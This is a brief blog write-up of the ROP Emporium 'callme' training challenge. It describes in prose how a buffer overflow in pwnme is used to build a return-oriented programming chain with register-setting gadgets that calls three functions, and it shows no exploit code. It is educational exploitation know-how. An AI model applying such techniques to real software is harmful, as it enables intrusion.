ropemporium - challenge 3 'callme'
Now it’s time to call some functions with multiple arguments.
gdb
As we can see we will again overflow read in the pwnme function to rop our way through 3 functions, as demanded in the challenge description
Here we can see the gadgets we need, we could use pop rdi; pop rsi; pop rdx; ret; to have the easiest and shortest way but i chose to split it into 2 gadgets.
Our final exploit once again automates the offset-finding, uses hardcoded adresses of the required functions and delivers arguments via rop-chaining by abusing given gadgets to set the registers and then call the required functions.
Conclusion
Now it’s looking more like rop!
This post is licensed under CC BY 4.0 by the author.